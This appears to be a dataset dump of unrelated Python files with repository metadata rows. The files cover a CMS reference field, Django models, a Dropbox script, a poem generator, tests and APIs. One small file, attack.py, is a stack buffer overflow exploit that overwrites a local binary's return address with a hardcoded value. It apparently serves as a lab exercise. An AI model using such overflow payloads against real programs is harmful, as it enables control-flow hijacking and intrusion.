""" property_names = Validator.property_names + [ 'required'] message_names = Validator.message_names + [ 'required_not_found', 'invalid_value'] required = fields.CheckBoxField( 'required', title='Required', description=( u"Checked if the field is required; the user has to fill in some " u"data."), default=1) required_not_found = u"Input is required but no input given." invalid_value = u"Input is incorrect" def validate(self, field, key, REQUEST): multiple = bool(field.get_value('multiple')) value = REQUEST.form.get(key, None) def convert(identifier): try: content = get_content_from_id(int(identifier)) except ValueError: self.raise_error('invalid_value', field) if ISilvaObject.providedBy(content): return content return None if value: if multiple: if not isinstance(value, list): value = [value] value = filter(lambda v: v is not None, map(convert, value)) if len(value): return value else: value = convert(value) if value is not None: return value if field.get_value('required'): self.raise_error('required_not_found', field) return value def serializeValue(self, field, value, producer): if not value: return handler = producer.getHandler() options = handler.getOptions() if options.external_rendering: return if not bool(field.get_value('multiple')): value = [value] exported = handler.getExported() producer.startPrefixMapping(None, NS_REFERENCES) for target in value: if value is not None: if is_inside_container(exported.root, target): target_path = [exported.root.getId()] + relative_path( exported.rootPath, target.getPhysicalPath()) producer.startElement('path') producer.characters(canonical_path('/'.join(target_path))) producer.endElement('path') else: if options.external_references: exported.reportProblem( (u"A reference field '{0}' refers to an " + u'content outside of the export ({1}).').format( field.getId(), '/'.join(relative_path( exported.rootPath, target.getPhysicalPath()))), producer.context) producer.startElement('path') producer.endElement('path') else: raise ExternalReferenceError( _(u"External reference"), producer.context, target, exported.root) producer.endPrefixMapping(None) def deserializeValue(self, field, value, context): # value should be an lxml node solver = ReferencesSolver(context, field) for entry in value.xpath('ref:path', namespaces={'ref': NS_REFERENCES}): solver.add(entry.text) return solver class ValueInfo(object): pass class BoundReferenceWidget(object): """Render a widget. """ template = ChameleonPageTemplate( filename='formulator_templates/reference_input.cpt') def __init__(self, context, request, field, value): self.context = context self.request = request # For security self.__parent__ = context # For the widget self.id = field.generate_field_html_id() self.name = field.generate_field_key() self.title = field.title() self.multiple = bool(field.get_value('multiple')) self.required = bool(field.get_value('required')) css_class = [] if self.multiple: css_class.append('field-multiple') if self.required: css_class.append('field-required') self.css_class = ' '.join(css_class) or None self.value = None self.value_id = None self.extra_values = [] resolver = ReferenceInfoResolver( self.request, self.context, self, multiple=self.multiple, message=field.get_value('default_msg') or _(u"No content selected.")) resolver.update( interface=field.get_interface(), show_index=field.get_value('show_container_index')) if self.multiple: self.values = [] # Support for one value list from the request (string are lists...). 
if isinstance(value, basestring) or not isinstance(value, list): if value: value = [value] else: value = [] # Go through each value and prepare information for item in value: info = ValueInfo() if isinstance(item, (basestring, int)): resolver.add(value_id=item, sub_widget=info) else: resolver.add(value=item, sub_widget=info) self.values.append(info) self.value = len(self.values) and self.values[0] or None self.extra_values = len(self.values) and self.values[1:] or [] else: # Prepare information self.value = ValueInfo() if isinstance(value, (basestring, int)): resolver.add(value_id=value, sub_widget=self.value) else: resolver.add(value=value, sub_widget=self.value) # Shortcut for template. if self.value is not None: self.value_id = self.value.value_id def default_namespace(self): return {'context': self.context, 'request': self.request, 'view': self} def namespace(self): return {} def __call__(self): return self.template.render(self) class ReferenceWidget(Widget): """Widget to select a reference. """ property_names = Widget.property_names + [ 'interface', 'multiple', 'default_msg', 'show_container_index'] default = fields.ReferenceField( 'default', title=u'Default', description=u'Default value (not supported, required by Formulator).', default='', required=0) interface = fields.InterfaceField( 'interface', title=u'Interface', description=u'Interface that selected contents must comply with.', default=ISilvaObject, required=1) multiple = fields.CheckBoxField( 'multiple', title='Multiple', description=(u'If checked, multiple contents can be selected as target ' u'of the reference'), default=0, required=1) show_container_index = fields.CheckBoxField( 'show_container_index', title="Show containers index", description=(u"Allows to select containers index as target. " u"In most cases it is not needed; choosing the container " u"itself is preferred."), default=0, required=1) default_msg = fields.StringField( 'default_msg', title=u'Default Message', description=(u'Default message displayed to the user if ' u'the field is empty.'), default='', required=0) view_separator = fields.StringField( 'view_separator', title='View separator', description=( "When called with render_view, this separator will be used to " "render individual items."), width=20, default='<br />\n', whitespace_preserve=1, required=1) def render(self, field, key, value, REQUEST): # REQUEST is None. So hack to find it again. # The context of the form is the acquisition context of this form. context = aq_parent(field) if context is None: return u'<p>Not available.</p>' request = get_request() if isinstance(value, basestring) and not len(value): # This correspond to empty. However Formulator have # problems with that concept. value = None widget = BoundReferenceWidget(context, request, field, value) return widget() def render_view(self, field, value): def render_value(value): return value.get_title_or_id() if not field.get_value('multiple'): value = [value] try: separator = str(field.get_value('view_separator')) except KeyError: separator = '<br />\n' return separator.join(map(render_value, value)) class ReferenceField(ZMIField): """Formulator reference field. 
""" meta_type = "ReferenceField" widget = ReferenceWidget() validator = ReferenceValidator() def get_interface(self): try: interface = self.get_value('interface') except KeyError: interface = ISilvaObject return interface.__identifier__ # This get initialized by Grok and register the formulator widget FieldRegistry.registerField(ReferenceField, 'www/BasicField.gif') class ReferenceValueWriter(FieldValueWriter): component.adapts(ReferenceField, Interface) def __init__(self, *args): super(ReferenceValueWriter, self).__init__(*args) self.context = self.form.context def delete(self): if self.identifier in self.content.__dict__: identifier = self.content.__dict__[self.identifier] references = ReferenceSet(self.context, identifier) references.set([]) del self.content.__dict__[self.identifier] def __call__(self, value): multiple = bool(self.field._field.get_value('multiple')) if isinstance(value, ReferencesSolver): value.defer(self.__call__, not multiple, self.context) return if value is None: value = [] elif multiple: assert isinstance(value, list) else: assert ISilvaObject.providedBy(value) value = [value] if self.identifier in self.content.__dict__: identifier = self.content.__dict__[self.identifier] else: identifier = unicode(uuid.uuid1()) self.content.__dict__[self.identifier] = identifier self.content._p_changed = True references = ReferenceSet(self.context, identifier) references.set(value) class ReferenceValueReader(FieldValueReader): component.adapts(ReferenceField, Interface) def __init__(self, *args): super(ReferenceValueReader, self).__init__(*args) self.context = self.form.context def __call__(self, default=None): if self.identifier in self.content.__dict__: identifier = self.content.__dict__[self.identifier] references = list(ReferenceSet(self.context, identifier)) if len(references): if self.field._field.get_value('multiple'): return references return references[0] return default
UTF-8
Python
false
false
2,013
6,356,551,619,435
d439102f0f855b16ef2c73a5ab3f9b0d4a6f6c3f
9a3292433bca817a10fc0ad84c3e91441ec4ea00
/app/models.py
4051079da9a3860341376ace3b13f04adda8d480
[]
no_license
sw-iknow/toknow2
https://github.com/sw-iknow/toknow2
0653c31ee146a6ee3c73731a70cc362e01830163
5732b13cb88ea206321e912f1f40afbceec50fd0
refs/heads/master
2020-05-19T07:56:29.603111
2014-04-06T16:00:40
2014-04-06T16:00:40
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.db import models
from django.contrib.auth.models import User


class UserInfo(models.Model):
    message = models.CharField(max_length=200)
    authuser_id = models.ForeignKey(User)


class SkillType(models.Model):
    level = models.IntegerField()
    parent_id = models.ForeignKey("self", null=True)
    name = models.CharField(max_length=200)
    url = models.CharField(max_length=200)


class SkillInstance(models.Model):
    user_id = models.ForeignKey(UserInfo)
    skill_type_id = models.ForeignKey(SkillType)
    instance_type = models.CharField(max_length=30)
    snippet = models.CharField(max_length=200)


class Hookup(models.Model):
    requester_id = models.ForeignKey(UserInfo, related_name='requester_hookups')
    offerer_id = models.ForeignKey(UserInfo, related_name='offerer_hookups')
    rating = models.IntegerField()
    date = models.DateField()
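A minimal usage sketch for these models. The model and field names come from the file above; the import path app.models, the concrete values, and the user credentials are assumptions made purely for illustration.

# Assumed import path based on the file location /app/models.py.
from django.contrib.auth.models import User
from app.models import UserInfo, SkillType, SkillInstance

user = User.objects.create_user('alice', 'alice@example.com', 'secret')
info = UserInfo.objects.create(message='hello', authuser_id=user)

python_skill = SkillType.objects.create(level=1, parent_id=None,
                                        name='Python', url='/skills/python/')
SkillInstance.objects.create(user_id=info, skill_type_id=python_skill,
                             instance_type='github', snippet='wrote a parser')

# Reverse lookup via Django's default related-name convention.
info.skillinstance_set.count()  # -> 1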
UTF-8
Python
false
false
2,014
893,353,209,154
456d218a9eb8234bb1041c4b0b93942ce77e26e6
219bda07dd412489b2458d9832b6a75efa722801
/Dropbox_API/dropbox_api_4_descargar_archivos.py
d806a51d3078e601c945f14491ce88359fd27883
[]
no_license
LuqueDaniel/Experimentos_Python
https://github.com/LuqueDaniel/Experimentos_Python
9834304f7e03fe844bec4d4303eaaeb42f808c0e
97d4ca94d62e67f5d55f829f06bc4a0065edf67c
refs/heads/master
2021-01-25T04:53:04.575600
2014-02-14T12:44:26
2014-02-14T12:44:26
3,506,849
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#encoding: utf-8
from dropbox import client, session, rest

app_key = ''     # APP KEY
app_secret = ''  # APP_SECRET
app_type = 'app_folder'

sesion = session.DropboxSession(app_key, app_secret, app_type)
request_token = sesion.obtain_request_token()

url = sesion.build_authorize_url(request_token)
print "url:", url
# "Visit the URL above and authorize the application, then press Enter"
print "Visite la URL de arriba y permita la aplicación, a continuación presione intro"
raw_input()

access_token = sesion.obtain_access_token(request_token)
cliente = client.DropboxClient(sesion)

# Download /url.txt from the app folder and save it locally.
file_drop, metadata = cliente.get_file_and_metadata('/url.txt')
file_local = open('file_url.txt', 'w')
file_local.write(file_drop.read())
print(metadata)
UTF-8
Python
false
false
2,014
15,238,543,966,425
26c790b0cdb09a22ee999065d0bd27dbd35637f8
c9f8f0a2f22dba5e800eb70ddba8da01cf6b97e0
/versifier.py
3e3716d22ea791496b17efcd9c1898dcc52a8127
[]
no_license
jeffbinder/versifier
https://github.com/jeffbinder/versifier
a13c8d0d5a28e640cbe4ac7c6e49acb7e267660c
032c6211fa5f4c9755c8f61ccec7254ea0392e68
refs/heads/master
2016-09-08T01:11:55.797779
2014-07-14T02:17:06
2014-07-14T02:17:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import pickle import random import re import unicodedata n = 2 from nltk.corpus import cmudict dictionary = cmudict.dict() from nltk.corpus import stopwords stopwords = stopwords.words('english') vowel_cluster = re.compile('[aeiouyAEIOUY]+') word = re.compile(r'\w[\w\']*|\'\w[\w\']*') def remove_accents(str): nkfd_form = unicodedata.normalize('NFKD', str) return u''.join([c for c in nkfd_form if not unicodedata.combining(c)]) def get_nsyls(tok): if not word.match(tok): return 0 if not tok in dictionary: num_vowel_clusters = vowel_cluster.findall(remove_accents(tok)) nsyls = len(num_vowel_clusters) if nsyls == 0: nsyls = 1 return nsyls pron = dictionary[tok][0] nsyls = sum(1 for ph in pron if ph[-1].isdigit()) return nsyls def get_meter(tok): if not word.match(tok): return '' if not tok in dictionary: return None pron = dictionary[tok][0] meter = '' for ph in pron: if ph[-1].isdigit(): meter += 'u' if ph[-1] == '0' else '-' return meter def get_rhyme(tok): if not tok in dictionary: return None pron = dictionary[tok][0] rhyme = '' for ph in pron: if ph[-1].isdigit(): rhyme = ph else: rhyme += ph return rhyme def validate_punct(tok, desired_meter, punct_permitted, desired_rhyme): if tok in ('$', '{', '}', '(', ')', '[', ']') or tok.isdigit(): return False if word.match(tok): return False return punct_permitted def validate_word(tok, desired_meter, punct_permitted, desired_rhyme): if tok.isdigit(): return False if not word.match(tok): return False meter = get_meter(tok) if meter: if not desired_meter.startswith(meter): return False nsyls = len(meter) else: return False # Alternative: just check the estimated number of syllables and ignore # meter for words not in the dictionary. #nsyls = get_nsyls(tok) #if '|' in desired_meter[:nsyls]: # return False if (len(desired_meter) <= nsyls or desired_meter[nsyls] == '|') and desired_rhyme: if tok in stopwords: return False rhyme = get_rhyme(tok) if desired_rhyme is True: return rhyme is not None else: rhyme_pattern, prohibited_words = desired_rhyme return rhyme == rhyme_pattern and tok not in prohibited_words return True def get_next_tok(c, corpus_id, last_toks, desired_meter, punct_permitted, desired_rhyme): if len(last_toks) == 2: c.execute('''SELECT tok3, count FROM trigram WHERE corpus_id = %s AND tok1 = %s AND tok2 = %s''', (corpus_id, last_toks[0], last_toks[1])) elif len(last_toks) == 1: c.execute('''SELECT tok2, count FROM bigram WHERE corpus_id = %s AND tok1 = %s''', (corpus_id, last_toks[0])) elif len(last_toks) == 0: c.execute('''SELECT tok1, count FROM unigram WHERE corpus_id = %s''', (corpus_id,)) if not c.rowcount: return get_next_tok(c, corpus_id, last_toks[1:], desired_meter, punct_permitted, desired_rhyme) d = dict(c.fetchall()) # First determine whether there will be a punctuation mark next. punct_options = [tok for tok in d if validate_punct(tok, desired_meter, punct_permitted, desired_rhyme)] total = sum(d[x] for x in d) probs = [] p1 = 0.0 for tok2 in punct_options: p2 = p1 + float(d[tok2]) / total probs.append((tok2, p1, p2)) p1 = p2 probs.append((None, p1, 1.0)) x = random.random() for tok, p1, p2 in probs: if x >= p1 and x < p2: break if tok: return tok, desired_meter # If a punctuation mark wasn't selected, try to find a word to use. word_options = [tok for tok in d if validate_word(tok, desired_meter, punct_permitted, desired_rhyme)] if not word_options: if len(last_toks) == 0: return None else: return get_next_tok(c, corpus_id, last_toks[1:], desired_meter, punct_permitted, desired_rhyme) total = sum(d[x] for x in word_options) probs = [] p1 = 0.0 for tok2 in word_options: p2 = p1 + float(d[tok2]) / total probs.append((tok2, p1, p2)) p1 = p2 x = random.random() for tok, p1, p2 in probs: if x >= p1 and x < p2: break nsyls = get_nsyls(tok) return tok, desired_meter[nsyls:] def generate_poem(c, corpus_id, meter, rhyme_scheme, max_len, gen_html=False): remaining_meter = meter remaining_rhyme_scheme = rhyme_scheme last_toks = ('$',) * n start_of_line = True start_of_sentence = True punctuation_permitted = False hyphen_before = False rhymes = {} poem = '' while remaining_meter: if remaining_meter.startswith('|'): # Used when there is an empty line. poem += '<br/>' if gen_html else '\n' remaining_meter = remaining_meter[1:] start_of_line = True if remaining_rhyme_scheme: rhyme_type = remaining_rhyme_scheme[0] desired_rhyme = rhymes.get(rhyme_type, True) else: desired_rhyme = False result = get_next_tok(c, corpus_id, last_toks, remaining_meter, punctuation_permitted and not start_of_line, desired_rhyme) if result: tok, remaining_meter = result else: return generate_poem(c, corpus_id, meter, rhyme_scheme, max_len, gen_html) if word.match(tok): punctuation_permitted = True else: punctuation_permitted = False if not start_of_line and not hyphen_before and word.match(tok): poem += ' ' if start_of_sentence: if tok.startswith('\''): poem += '\'' + tok[1:].capitalize() else: poem += tok.capitalize() elif tok == 'i': poem += 'I' elif tok.startswith('i\''): poem += tok.capitalize() else: poem += tok if tok in ('.', '!', '?'): start_of_sentence = True else: start_of_sentence = False if tok.endswith('-'): hyphen_before = True else: hyphen_before = False if remaining_meter.startswith('|'): if rhyme_type in rhymes: rhyme, prohibited_words = rhymes[rhyme_type] rhymes[rhyme_type] = (rhyme, prohibited_words + [tok]) else: rhymes[rhyme_type] = (get_rhyme(tok), [tok]) poem += '<br/>' if gen_html else '\n' remaining_meter = remaining_meter[1:] remaining_rhyme_scheme = remaining_rhyme_scheme[1:] start_of_line = True else: start_of_line = False if max_len is not None and len(poem) > max_len - 1: return generate_poem(c, corpus_id, meter, rhyme_scheme, max_len, gen_html) last_toks = tuple(last_toks[i+1] if i < n - 1 else tok for i in xrange(n)) return poem + '.'
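The meter and rhyme checks in versifier.py hinge on the CMU pronouncing dictionary: each vowel phone carries a stress digit, and get_meter() turns that into a string of 'u' (unstressed) and '-' (stressed) marks. The small standalone demo below restates just that step; it requires NLTK's cmudict corpus, and the outputs shown assume the standard CMU entries for the two example words.

# Standalone illustration of the stress-extraction step used by get_meter().
from nltk.corpus import cmudict

dictionary = cmudict.dict()

def get_meter(tok):
    """'u' for an unstressed syllable, '-' for a stressed one."""
    pron = dictionary[tok][0]
    meter = ''
    for ph in pron:
        if ph[-1].isdigit():           # vowel phones end in a stress digit
            meter += 'u' if ph[-1] == '0' else '-'
    return meter

print(get_meter('poetry'))   # expected '-uu' with the standard CMU entry
print(get_meter('tonight'))  # expected 'u-'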
UTF-8
Python
false
false
2,014
13,305,808,687,385
895f9eead35db05078bbe9b0653d911e962d2528
292a88ec6d7ec5943b4df3f4f549d28aacdbc233
/md_sync.py
7e204e96206a9e3fbbf01e27d524ef687faa7037
[]
no_license
liyunhai/res-auto
https://github.com/liyunhai/res-auto
e902cfa532dbaa27d0133849abc124f0ac7ff952
1552752fd637ccaac758830113d417a7cf3712b0
refs/heads/master
2020-06-03T10:52:38.706232
2013-10-15T07:01:00
2013-10-15T07:01:00
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/python
# -*- coding: utf-8 -*-

from models import *


def syncMovie(l_movie):
    movies = Movie.select().where(Movie.movie_number == l_movie.number)
    if movies.count() == 0:
        print('    missing movie data: ' + l_movie.number)
        return
    movie = movies.get()
    if l_movie.video_status == 'FHD':
        movie.movie_status = 'fhd_done'
    elif l_movie.video_status == 'HD':
        movie.movie_status = 'hd_done'
    elif l_movie.video_status == 'SD':
        movie.movie_status = 'sd_done'
    movie.save()
    l_movie.video_sync = True
    l_movie.save()


def main():
    l_movies = L_JPN_Movie.select().where(L_JPN_Movie.video_sync == False)
    for l_movie in l_movies:
        print('begin to sync movie: ' + l_movie.number)
        syncMovie(l_movie)


if __name__ == '__main__':
    main()
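The script relies on a models module that is not shown here. Its query style (Model.select().where(...), .get(), .save()) matches peewee's API, so the following is a hedged sketch of what that module might look like; the database backend, table layout, and any field not referenced by md_sync.py are pure assumptions.

# Hypothetical models.py sufficient for md_sync.py above, written with peewee.
from peewee import SqliteDatabase, Model, CharField, BooleanField

db = SqliteDatabase('media.db')  # assumed storage backend


class BaseModel(Model):
    class Meta:
        database = db


class Movie(BaseModel):
    movie_number = CharField()
    movie_status = CharField(null=True)   # set to 'fhd_done' / 'hd_done' / 'sd_done'


class L_JPN_Movie(BaseModel):
    number = CharField()
    video_status = CharField()             # 'FHD' / 'HD' / 'SD'
    video_sync = BooleanField(default=False)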
UTF-8
Python
false
false
2,013
13,039,520,732,520
f9ab925bcdc29ab79a1b362a8ace5949dffc1e48
56e7be69d923dd86e15e56ac5ccff3447357ed6c
/ion/services/coi/exchange/exchange_boilerplate.py
b52ed355790989a1ed540591915eecaa78967c7c
[ "LicenseRef-scancode-proprietary-license" ]
non_permissive
nimbusproject/lcaarch
https://github.com/nimbusproject/lcaarch
9d59477f4ce1595f1e12962202a0d51a4f5db5cf
01f98003969960614c467b41a7da8113c0393532
refs/heads/cei
2020-07-05T01:30:15.634580
2011-02-11T07:18:47
2011-02-11T07:18:47
910,688
0
3
null
false
2015-09-29T05:16:15
2010-09-14T19:04:37
2013-09-28T12:14:12
2011-03-07T22:21:50
3,600
2
1
1
Python
null
null
#!/usr/bin/env python """ @file ion/play/hello_resource.py @author David Stuebe @brief An example service definition that can be used as template for resource management. """ import ion.util.ionlog import ion.util.procutils as pu from ion.core.process.process import ProcessFactory, Process, ProcessClient from ion.core.process.service_process import ServiceProcess, ServiceClient from ion.core.messaging.message_client import MessageClient from ion.core.object import object_utils from ion.core import ioninit from ion.services.coi.resource_registry_beta.resource_client import ResourceClient, ResourceInstance from ion.services.coi.resource_registry_beta.resource_client import ResourceClientError, ResourceInstanceError from twisted.internet import defer CONF = ioninit.config(__name__) log = ion.util.ionlog.getLogger(__name__) resource_request_type = object_utils.create_type_identifier(object_id=10, version=1) resource_response_type = object_utils.create_type_identifier(object_id=12, version=1) exchangespace_type = object_utils.create_type_identifier(object_id=1001, version=1) exchangename_type = object_utils.create_type_identifier(object_id=1001, version=1) queue_type = object_utils.create_type_identifier(object_id=1001, version=1) binding_type = object_utils.create_type_identifier(object_id=1001, version=1) class ExchangeManagementError(Exception): """ An exception class for the Exchange Management system. """ class ServiceHelper: def __init__(self, proc): self.proc = proc self.rc = ResourceClient(proc=proc) self.mc = MessageClient(proc=proc) def check_request(self, msg, type): """ """ if msg.MessageType != resource_request_type: raise ExchangeManagementError('wrong message type: %s' % str(msg.MessageType)) if msg.HasField('resource_reference'): raise ExchangeManagementError('resource_reference field expected to be unset, received: %s' % msg.resource_reference) @defer.inlineCallbacks def create_object(self, msg, name, description): object = msg.configuration type = object.ObjectType object = yield self.rc.create_instance(type, name, description) yield defer.returnValue(object) @defer.inlineCallbacks def push_object(self, object): yield self.rc.put_instance(object) response = yield self.mc.create_instance(exchangespace_type, name='create_instrument_resource response') response.resource_reference = self.rc.reference_instance(object) response.configuration = object.ResourceObject response.result = 'Created' yield defer.returnValue(response) class ClientHelper: def __init__(self, proc): self.proc = proc self.mc = MessageClient(proc=proc) @defer.inlineCallbacks def create_object(self, type): msg = yield self.mc.create_instance(resource_request_type, name='create_object') msg.configuration = msg.CreateObject(type) defer.returnValue(msg)
UTF-8
Python
false
false
2,011
10,943,576,700,525
fe735acb2298098dc1cceaba930f1daa85c50bca
6e81a449c6a75d6e478b626f72245a41156b9198
/astropy/utils/tests/test_timer.py
e5e28dac300766291e431d0015567e03c3bfb20d
[]
no_license
askielboe/astropy
https://github.com/askielboe/astropy
15aed53fe8b64ab6d16e22ff39c70ff3ddfc30bf
358303ca0439c48e69902293297932db99b3dfd4
refs/heads/master
2021-01-18T07:24:50.242590
2013-02-27T06:43:54
2013-02-27T06:43:54
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Test `astropy.utils.timer`.

.. note:: The tests might fail if the function being timed deviates from the
    expected run time by more than `ACCURACY_DECIMAL` decimals.

"""
# STDLIB
import time

# THIRD-PARTY
import numpy as np

# LOCAL
from ..timer import RunTimePredictor

ACCURACY_DECIMAL = 3  # For np.testing.assert_almost_equal()


def func_to_time(x):
    """This sleeps for x seconds for timing tests."""
    time.sleep(x)
    return 'Slept for {0} second(s)'.format(x)


class TestRunTimePredictor(object):
    """Test `astropy.utils.timer.RunTimePredictor`."""

    def setup_class(self):
        self.p = RunTimePredictor(func_to_time)

    def test_expected_errors(self):
        try:
            self.p.do_fit()
        except AssertionError as e:
            assert str(e) == 'Requires 3 points but has 0'
        try:
            self.p.predict_time(100)
        except AssertionError as e:
            assert str(e) == 'No fitted data for prediction'

    def test_baseline(self):
        self.p.time_func([0.1, 0.2, 0.5, -1, 1.5])
        self.p.time_func(1.0)
        assert self.p._funcname == 'func_to_time'
        assert self.p._cache_bad == [-1]
        assert self.p.results == {0.1: 'Slept for 0.1 second(s)',
                                  0.2: 'Slept for 0.2 second(s)',
                                  0.5: 'Slept for 0.5 second(s)',
                                  1.5: 'Slept for 1.5 second(s)',
                                  1.0: 'Slept for 1.0 second(s)'}

    def test_fitting(self):
        a = self.p.do_fit()
        assert self.p._power == 1
        np.testing.assert_almost_equal(a, (1, 0), ACCURACY_DECIMAL)

    def test_prediction(self):
        t = self.p.predict_time(100)
        assert round(t) == 100
        # Repeated call to access cached run time
        t2 = self.p.predict_time(100)
        assert t == t2
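Distilled from the test above, this is how the class under test is typically driven: time the function at a few sample inputs, fit a power law, then extrapolate. The method names (time_func, do_fit, predict_time) are exactly those exercised by the test; everything else is an illustrative stand-in.

import time
from astropy.utils.timer import RunTimePredictor

def work(x):
    time.sleep(x)          # stand-in for a task whose cost scales with x
    return x

p = RunTimePredictor(work)
p.time_func([0.1, 0.2, 0.5, 1.0])   # measure a few sample runs
p.do_fit()                          # fit run time as a power law of the input
print(p.predict_time(100))          # extrapolated cost for x=100, roughly 100 s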
UTF-8
Python
false
false
2,013
10,557,029,651,587
d039045d12fad4a74b176ad4580ef2f6cdf9de73
a0797e0ecb4dbd25d2c004fa65852661f3f7b52f
/attack.py
09ed3c610ef88550c1a993e91dbe79ff17720053
[]
no_license
wufan0920/stack-overflow
https://github.com/wufan0920/stack-overflow
effcfec9304398f6178e729b72145308994c0b95
6451a3478005e699ccc6fb1d64c48c9fe95b94f2
refs/heads/master
2016-08-07T05:05:10.221819
2014-08-05T15:20:53
2014-08-05T15:20:53
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import os

cmd = './stack '
attack_str = cmd + '1'*512 + '\x14' + '\x84' + '\x04' + '\x08'
os.system(attack_str)
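The four escaped bytes are a 32-bit address written little-endian: they encode 0x08048414, the return address the overflow is meant to install after 512 bytes of filler. A slightly more readable way to build the same payload (Python 2, like the original, so struct.pack returns a str); the 512-byte offset and the target address are specific to whatever vulnerable ./stack binary the original author was attacking, and are assumptions here.

import os
import struct

ret_addr = struct.pack('<I', 0x08048414)   # little-endian: '\x14\x84\x04\x08'
payload = '1' * 512 + ret_addr             # filler up to the saved return address
os.system('./stack ' + payload)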
UTF-8
Python
false
false
2,014
12,206,297,090,460
fa9bf94a9deb8c441225c8d0dbbacca6bda03352
73d728df82f1d4a1d8054ee3cbcd104becf0592e
/server/apps/acl/api.py
87227a7b446a50955cab4dfda6310752a22346c7
[ "MIT" ]
permissive
Ecotrust/usvi
https://github.com/Ecotrust/usvi
4c5399deef08bf9f3b7e3364240c47cc3227fd30
454e1f8d6ff97548595ddaecd023c5db3b08f7bc
refs/heads/master
2020-04-06T04:36:41.367825
2014-05-29T17:27:06
2014-05-29T17:27:06
13,626,648
0
0
null
false
2014-08-07T01:17:45
2013-10-16T17:51:17
2014-06-19T21:29:22
2014-05-29T17:27:09
44,594
1
3
80
JavaScript
null
null
from tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS
from tastypie.contrib.contenttypes.fields import GenericForeignKeyField
from tastypie import fields

from .models import AnnualCatchLimit, Species, SpeciesFamily, AREA_CHOICES, SECTOR_CHOICES
from survey.api import SurveyModelResource, StaffUserOnlyAuthorization


class SpeciesResource(SurveyModelResource):
    class Meta:
        ordering = ['name']
        queryset = Species.objects.all().order_by('name')
        authorization = StaffUserOnlyAuthorization()
        filtering = {
            'name': ['icontains'],
        }


class SpeciesFamilyResource(SurveyModelResource):
    class Meta:
        queryset = SpeciesFamily.objects.all().order_by('name')
        authorization = StaffUserOnlyAuthorization()
        filtering = {
            'name': ['icontains'],
        }


class AnnualCatchLimitResource(SurveyModelResource):
    by_species = fields.BooleanField(readonly=True, attribute="by_species")
    species = GenericForeignKeyField({
        Species: SpeciesResource,
        SpeciesFamily: SpeciesFamilyResource
    }, 'species', full=True, null=True)

    def alter_detail_data_to_serialize(self, request, bundle):
        if 'meta' not in bundle.data:
            bundle.data['meta'] = {}
        bundle.data['meta']['area_choices'] = AREA_CHOICES
        bundle.data['meta']['sector_choices'] = SECTOR_CHOICES
        return bundle

    def alter_list_data_to_serialize(self, request, bundle):
        if 'meta' not in bundle:
            bundle['meta'] = {}
        bundle['meta']['area_choices'] = AREA_CHOICES
        bundle['meta']['sector_choices'] = SECTOR_CHOICES
        return bundle

    def get_object_list(self, request):
        objects = super(AnnualCatchLimitResource, self).get_object_list(request)
        user_tags = [tag.name for tag in request.user.profile.tags.all()]
        if 'puerto-rico' not in user_tags:
            objects = objects.exclude(area='puertorico')
        if 'usvi' not in user_tags:
            objects = objects.exclude(area='stcroix')
            objects = objects.exclude(area='stthomasstjohn')
        return objects

    class Meta:
        always_return_data = True
        queryset = AnnualCatchLimit.objects.all()
        authorization = StaffUserOnlyAuthorization()
        filtering = {
            'area': ALL,
        }
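These resources only become reachable once they are registered with a tastypie Api object in a urls.py. A hedged sketch of that wiring follows; the 'v1' api_name, the /api/ mount point, and the acl.api import path (inferred from the file location server/apps/acl/api.py) are assumptions, not something stated in the file above.

from django.conf.urls import url, include, patterns
from tastypie.api import Api

from acl.api import SpeciesResource, SpeciesFamilyResource, AnnualCatchLimitResource

v1_api = Api(api_name='v1')
v1_api.register(SpeciesResource())
v1_api.register(SpeciesFamilyResource())
v1_api.register(AnnualCatchLimitResource())

urlpatterns = patterns(
    '',
    url(r'^api/', include(v1_api.urls)),
)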
UTF-8
Python
false
false
2,014
10,127,532,890,852
723fbabe72cada149dd9052db3b3021dc1d0c90d
4fe6c1e3e86c443b2c866bfd0e41e949c886ba26
/get_interesting_pams.py
1d424991c333b90c6eea9c47fe11538f706644c7
[]
no_license
xl0/adaptation
https://github.com/xl0/adaptation
ef3873f4b0127eaee0ab45f92fb13978474ffe71
250f35eb3cd9833412361826a845e4b273a55005
refs/heads/master
2020-12-24T17:44:29.468469
2014-09-15T16:59:01
2014-09-15T16:59:01
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python2.7 import os import sys from Bio import SeqIO from collections import defaultdict, OrderedDict import matplotlib matplotlib.use("Agg") from matplotlib import pyplot import argparse import json from utils import * def main(): parser = argparse.ArgumentParser(description='Extract spacers that consistently hit top or bottom 10%') parser.add_argument('inputs', metavar='<frequency.json>', type=str, nargs='+', help='Input file with PAMs and spacers annotated.') parser.add_argument('-o', metavar='out_file.json', required=True) args = parser.parse_args() print 'Extracting consistent top/bottom 20%% %s -> %s' % ( ' '.join(args.inputs), args.o) data_dict = OrderedDict() top_pam_dict = defaultdict(list) bottom_pam_dict = defaultdict(list) for infile in args.inputs: data = json.load(open(infile)) experiment = data['experiment'] tag = data['tag'] hits = data['stats']['hit_spacers_good_pam'] pams = data['pams'] # Sorted bottom to top pam_list = sorted(pams.keys(), key = lambda e: pams[e]) # Top/bottom 20% bottom_pams = pam_list[0:len(pam_list) / 8] top_pams = pam_list[(len(pam_list) * 8) / 10:] for pam in bottom_pams: bottom_pam_dict[pam].append(float(pams[pam]) / hits) for pam in top_pams: top_pam_dict[pam].append(float(pams[pam]) / hits) template = data['template_seq'] num_measurements = len(args.inputs) all_top_pams = {} all_bottom_pams = {} for pam, numbers in top_pam_dict.iteritems(): all_top_pams[pam] = (len(numbers), float(sum(numbers)) / len(numbers)) for pam, numbers in bottom_pam_dict.iteritems(): all_bottom_pams[pam] = (len(numbers), float(sum(numbers)) / len(numbers)) print 'Top 10:' print json.dumps(all_top_pams, sort_keys=True, indent=4) print 'Bottom 10:' print json.dumps(all_bottom_pams, sort_keys=True, indent=4) output = { 'top_pams' : all_top_pams, 'bottom_pams' : all_bottom_pams, 'template' : template, 'num_measurements' : num_measurements } json.dump(output, open(args.o, 'wr+'), sort_keys=True, indent=4) if __name__ == '__main__': main()
